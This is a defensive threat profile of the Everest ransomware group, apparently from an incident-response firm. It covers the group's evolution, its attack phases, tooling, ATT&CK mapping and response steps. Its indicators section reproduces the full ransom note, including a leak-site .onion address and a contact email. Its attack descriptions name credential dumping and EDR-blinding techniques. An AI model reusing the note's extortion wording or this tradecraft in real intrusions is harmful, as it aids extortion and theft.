Everest Ransomware: Threat Profile, Attack Lifecycle, and Response Guide
Everest is a financially motivated ransomware and cyber extortion group active since at least December 2020. Over five years of activity, Everest has combined ransomware deployment, data-leak extortion, initial-access brokerage, and direct insider recruitment into a single, adaptable criminal operation that has proven resilient to infrastructure disruptions and law enforcement pressure.
The group has compromised or claimed attacks against organizations across healthcare, aerospace, government, aviation, and critical infrastructure, with victims spanning North America, Latin America, and Europe.
Origins and evolution of the Everest ransomware
Few ransomware groups have reinvented their operational model as deliberately as Everest. Over five years, the group moved from a data-theft-only operation to full double extortion, then pivoted toward access brokerage and insider recruitment as conditions in the criminal ecosystem shifted.
Understanding that progression matters for defenders: the tactics Everest uses today are a product of calculated adaptation, not a fixed playbook.
How did Everest start: Exfiltration-only origins
Everest emerged in December 2020 as a data theft and extortion operation. Early campaigns focused on network compromise, data exfiltration, and leak-site publication without deploying file-encrypting malware.
Initial targeting was concentrated in Canada, Latin America, and the public sector. Researchers noted early operational similarities to the EverBe 2.0 ransomware lineage, which informed later encryption design choices.
Everest ransomware evolves into double extortion
By 2021, Everest incorporated encryption into its operations, adopting the double extortion model that had become standard across the ransomware ecosystem.
Encryption routines used AES and DES algorithms, with a notable architectural decision: encryption keys were generated locally on victim hosts rather than delivered from a remote command-and-control server. This reduced dependency on centralized infrastructure and complicated decryption-key-based recovery approaches that assume server-side key custody.
The standard attack sequence became: initial compromise → reconnaissance → data exfiltration → encryption → public extortion via leak site.
2021–2023: Shift to initial access brokerage
Beginning around November 2021, HC3 reporting from the U.S. Department of Health and Human Services identified Everest operating as an initial access broker (IAB), selling compromised network footholds to other cybercriminal actors rather than always deploying ransomware directly.
By mid-2023, researchers documented a significant rise in IAB activity, with the group advertising RDP and VPN credentials on criminal forums and actively partnering with other ransomware-as-a-service operators.
This repositioned Everest simultaneously as a direct threat actor and a supplier to other criminal ecosystems, a materially different risk profile than a conventional ransomware group, and one that makes disrupting any single operation less effective.
Current strategy: Insider recruitment and data-only extortion
In October 2023, Everest began openly recruiting corporate insiders through cybercrime forums, advertising for employees willing to provide VPN access, IT administrators, and contractors with privileged credentials. Compensation offers included cash payments and revenue-sharing arrangements drawn from extortion proceeds.
When an attacker can recruit a legitimate employee, multi-factor authentication becomes less effective, and detection shifts from perimeter monitoring toward behavioral analysis of accounts that have every right to be where they are.
Recent reports indicate the group increasingly favors data-only extortion, bypassing encryption entirely in favor of faster, lower-footprint monetization. This trend likely reflects growing law enforcement pressure on traditional ransomware models and a preference for reduced forensic exposure.
In 2025, Everest's dark web leak site was defaced with the message "Don't do crime CRIME IS BAD xoxo from Prague." Security researchers speculated the defacement may have involved rival operators. Despite the disruption, the group continued operations, a pattern consistent across previous infrastructure setbacks.
Everest ransomware attack lifecycle
Not every Everest incident follows the same pattern. Some operations focus exclusively on data theft and extortion without deploying encryption. The following phases reflect the group's full-capability attack chain.
Phase 1: Initial access
Everest's primary entry point is through exposed remote services, including Remote Desktop Protocol (RDP) and VPN endpoints.
Additional access vectors include:
- Stolen credentials
- Purchased access from other brokers
- Phishing
- Exploitation of unpatched systems,
- Insider-provided access
Phase 2: Reconnaissance
Once inside, operators enumerate the environment: Active Directory discovery, network mapping, file share identification, backup location, and administrative privilege assessment.
Observed tooling includes SoftPerfect Network Scanner alongside built-in Windows utilities and PowerShell.
Backup identification is a deliberate early-phase priority; locating and later disrupting recovery options before the victim detects the intrusion is central to the group's pressure strategy.
Phase 3: Credential access
Credential harvesting typically involves using ProcDump to dump LSASS memory and extract credentials from the Windows process that manages authentication.
Harvested credentials enable subsequent lateral movement without triggering new authentication events, and support privilege escalation toward domain-level access.
Phase 4: Lateral movement
Everest relies heavily on legitimate administrative tools to blend with normal enterprise activity, a technique commonly referred to as living off the land. Observed tools include AnyDesk, Splashtop, Atera, RDP, SMB, and PowerShell remoting. These tools share behavioral signatures with legitimate IT operations, which is precisely why they are selected.
According to Proven Data’s expert Amr Fathy, WMI and PowerShell are the most common lateral movement tools. The commands look identical to those used in sysadmin activity. “We differentiate by context: which account, which time, which source, which child processes. WMI spawning certutil, for example,” he explains.
This behavioral differentiation, not signature detection, is the operative detection approach when legitimate tools constitute the primary threat.
Phase 5: Data exfiltration
Data exfiltration precedes encryption in Everest operations, and in data-only attacks, it is the entire operation.
Targeted data includes PII, PHI, financial records, legal documents, internal communications, intellectual property, and customer databases.
Staging relies on WinRAR and archive compression utilities, with exfiltration conducted over encrypted outbound channels that blend with normal web traffic.
Phase 6: Impact
When encryption is deployed, the ransomware appends .EVEREST to encrypted files and drops EVEREST LOCKER.txt as the ransom note.
Healthcare victims have reportedly received compressed extortion timelines designed to amplify operational pressure on environments with low downtime tolerance.
Across all incident types, victims face leak-site publication, countdown timers, and incremental sample data releases as escalating pressure mechanisms.
Tooling and defense evasion
The following toolset reflects Everest's documented approach:
- Cobalt Strike: a command-and-control framework for persistent remote access
- ProcDump: credential harvesting via LSASS memory dumping
- SoftPerfect Network Scanner: network enumeration
- WinRAR: data staging and archive compression
- AnyDesk, Splashtop, Atera: remote access and lateral movement
- PowerShell, WMI: scripting, execution, and remote administration
A defining behavioral pattern is the systematic post-execution deletion of tools, removing forensic artifacts after each operational phase to impede the reconstruction of the attack chain. This is paired with log tampering and temporary payload staging that leave minimal indicators once the operator has moved on.
Code analysis of Everest's encryption implementation links it to the BlackByte ransomware family and the EverBe 2.0 lineage. The local key generation design described earlier is one artifact of that lineage. Code overlap does not necessarily indicate a direct organizational relationship, but it does suggest shared development resources or code sourcing from overlapping criminal communities.
A broader evasion technique increasingly observed in ransomware operations is BYOVD (Bring Your Own Vulnerable Driver). "Attackers load a signed but vulnerable driver into kernel mode. Once there, they exploit it to terminate EDR processes and remove kernel callbacks. Some ransomware families now embed the vulnerable driver directly in the payload; the driver loads, EDR goes blind, encryption begins within seconds," explains Fathy
Everest ransomware targets
Everest has targeted organizations across healthcare, government, manufacturing, financial services, aerospace, transportation, critical infrastructure, telecommunications, energy, legal services, and education.
| Sector Targeting | Profile |
|---|---|
| Healthcare | Increasing since 2021; PHI, surgical facilities, operational urgency |
| Government | Federal agencies, public sector entities in the Americas |
| Aerospace & Defense | Supply chain exposure, industrial data |
| Aviation | Passenger data, airport system, third-party suppliers |
| Financial Services | Insurance, banking sector |
| Telecommunications | Network infrastructure operators |
| Energy | Power grid infrastructure (2025 claims, partially unverified) |
| Manufacturing | Capital goods, industrial organizations |
The HC3 unit within the U.S. Department of Health and Human Services issued a formal threat profile on Everest, identifying the group as a credible and growing risk to healthcare organizations. Specific risks include PHI exposure, disruption to surgical facilities, impacts on patient care, and HIPAA-related regulatory exposure.
The Ascension cyberattack established a clear precedent for how ransomware incidents translate into operational disruption at a healthcare scale. Healthcare remains a structurally attractive target due to its operational urgency, the value of PHI on criminal markets, limited tolerance for system downtime, and historically weaker network segmentation compared to the financial services or defense sectors.
For healthcare organizations evaluating their exposure, Proven Data's healthcare cybersecurity guide covers the specific controls and preparedness steps most relevant to this threat class.
Confirmed and claimed incidents
The following incidents have been attributed to or claimed by Everest. Where claims remain publicly unverified, consistent with the broader pattern of ransomware leak-site postings, that status is noted.
Government and Public Sector
- NASA: listed among notable historical victims in HC3 reporting
- Brazilian government: government sector entities confirmed as Everest targets
Aviation and Transportation
- Dublin Airport: The group is linked to a breach involving millions of passenger records connected to Dublin Airport systems, highlighting third-party supplier risk in the aviation sector
Aerospace and Defense
- Collins Aerospace: Everest claimed responsibility for a breach involving sensitive aerospace-sector data, with potential supply chain and industrial operations exposure
Financial Services
- Liberty Mutual: Everest allegedly began leaking purported Liberty Mutual data on its leak site in 2025
Retail and Consumer
- Under Armour: Everest claimed theft of 343 GB of data, including employee and customer PII, internal documents, and order histories
- Clarins: Everest allegedly leaked data affecting over 600,000 customers, including names, birth dates, addresses, and purchase histories
- Mailchimp: Everest claimed theft of CRM and customer-related data; the significance of the leak was publicly questioned by cybersecurity observers
Critical Infrastructure
Everest has claimed incidents affecting European airport systems, Swedish power infrastructure, and telecommunications networks. Some of these claims have not been independently confirmed.
MITRE ATT&CK
| ATT&CK Tactic | Technique | ID |
|---|---|---|
| Initial Access | External Remote Services | T1133 |
| Initial Access | Valid Accounts | T1078 |
| Initial Access | Exploit Public-Facing Applications | T1190 |
| Execution | Command and Scripting Interpreter | T1059 |
| Privilege Escalation | Exploitation for Privilege Escalation | T1068 |
| Credential Access | OS Credential Dumping | T1003 |
| Discovery | Remote System Discovery | T1018 |
| Discovery | System Information Discovery | T1082 |
| Lateral Movement | Remote Services | T1021 |
| Collection | Archive Collected Data | T1560 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
| Impact | Data Encrypted for Impact | T1486 |
| Defense Evasion | Indicator Removal on Host | T1070 |
Indicators of compromise
The following indicators are associated with Everest ransomware deployments, provided for detection and hunting purposes.
File system indicators
- Encrypted files appended with .EVEREST or .everest
- Ransom note file: EVEREST LOCKER.txt
Ransom note content transcript
Dear ,
Greetings from the Everest team. Your systems have been attacked, the files are encrypted. You can read about us in our blog (Tor browser needed)
Blog : ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad[.]onion
Or read about our group in Twitter
Also, our team was able to bypass your "Dataprotection" as any other your protection software and more than 1 Terabyte of internal files were exfiltrated to our servers, which we can confirm with great joy and ease
The list contains financial documents, internal orders, KYC information(documents,photos...), trusted representatives personal info
Client risk levels,loans, debt and client data. Various financial documentation, backups , etc. etc.
The information was collected both from personal PCs and from centralized storage locations.
If an agreement is reached with us, this information will never be published and the problem will disappear as if it never happened, otherwise it will be posted on our blog and darknet. Which will lead to even greater financial and reputational losses on your part.
Also you will get
1.Attack logbook (months of experience with your company) with full list of vulnerabilities and bypass methods
2.Advices how to singifically improve your security and avoid such attacks in the future
3.We will delete all files from your company
4.We will attack your company no more
Yours trully Everest Team
Email to contact: [email protected]
Your key:
Tool-based indicators
- Unexpected ProcDump execution or direct LSASS process access
- SoftPerfect Network Scanner launched from non-standard or non-IT accounts
- WinRAR activity in temporary, staging, or user-profile directories outside of IT workflows
- AnyDesk, Splashtop, or Atera sessions initiated from unrecognized accounts or outside business hours
- Cobalt Strike indicators: unusual named pipes, injected processes, irregular outbound beaconing patterns
Behavioral indicators
- PowerShell or WMI commands executing from accounts, times, or source hosts that do not match established baselines
- Encoded PowerShell combined with outbound network activity
- Large outbound data transfers to unfamiliar external endpoints
- Scheduled task creation or modification following initial access
- GPO changes or logon script modifications, particularly during recovery windows
- Administrative tool installation or execution followed by immediate file deletion
Responding to an Everest ransomware attack
Understanding how to respond to an Everest incident is as operationally important as understanding how the group operates. Proven Data's guide on how to handle a ransomware attack covers the broader response framework. The following priorities are specific to Everest's tradecraft.
Immediate containment
- Isolate affected hosts from the network without premature shutdown; early shutdown destroys volatile evidence that cannot be recovered.
- Disable or restrict VPN sessions and RDP access at the perimeter.
- Invalidate active tokens and sessions for any account believed to be compromised.
Evidence preservation
- Capture memory from affected systems before any remediation action.
- Collect authentication logs, VPN session records, and remote administration tool activity.
- Preserve Active Directory state, GPO configurations, and scheduled task records.
The quality of the forensic record determines how much of the incident can ultimately be reconstructed.
Persistence hunting
Everest operators embed persistence in locations that survive standard recovery workflows.
Fathy notes that attackers embed persistence where teams don't check during recovery: a weekly task that re-downloads a beacon, or a modified GPO that pushes malicious logon scripts. “We've seen clients recover successfully and get re-compromised within 48 hours from a poisoned GPO in their restored Active Directory backup."
Before any environment is declared clean, audit scheduled tasks, logon scripts, GPO configurations, AdminSDHolder ACL modifications, application registrations in Entra ID, and service configurations.
Do not restore Active Directory backups without validating them against pre-incident snapshots.
Credential rotation
Rotate credentials globally, not only for accounts that show direct compromise indicators.
In Everest incidents, credential exposure is typically broader than initial forensics suggest, because harvested credentials are used across multiple systems before any visible alert triggers.
Recovery sequencing
- Validate backup integrity before beginning restoration.
- Rebuild high-risk systems from verified clean images where possible rather than restoring from potentially compromised backups.
- Re-enable systems incrementally and maintain active monitoring throughout the recovery window.
Post-incident actions
- Conduct dark web monitoring for exfiltrated data appearing on Everest's leak site or traded on criminal forums.
- Assess HIPAA or other regulatory disclosure obligations where PHI may have been exposed.
- Review third-party and vendor access to identify whether the initial compromise entered through a supplier relationship rather than the primary environment.
Organizations requiring structured DFIR support or pre-incident preparedness can engage Proven Data's Incident Response Retainer for pre-negotiated access to response capabilities.
Strategic assessment
Everest represents the maturation of ransomware into a diversified cybercriminal enterprise. The group has cycled through four distinct operational models in five years: pure data extortion, double extortion with encryption, initial access brokerage, and insider-enabled data-only operations, with each transition improving operational resilience and revenue diversification.
For security teams, incident responders, and MSPs, the practical implication is that Everest incidents cannot be addressed solely by perimeter controls. Detecting this group requires behavioral analysis, identity monitoring, and post-compromise forensic capabilities in environments where the attacker may have operated undetected for weeks before triggering a visible alert.
Written by
Amr Fathy is a dedicated cybersecurity professional with over 7 years of extensive experience in digital forensics, incident response, reverse engineering, and threat intelligence. He currently serves as Senior DFIR Engineer at Proven Data LLC, conducting triage collection, incident response, and digital forensics activities.
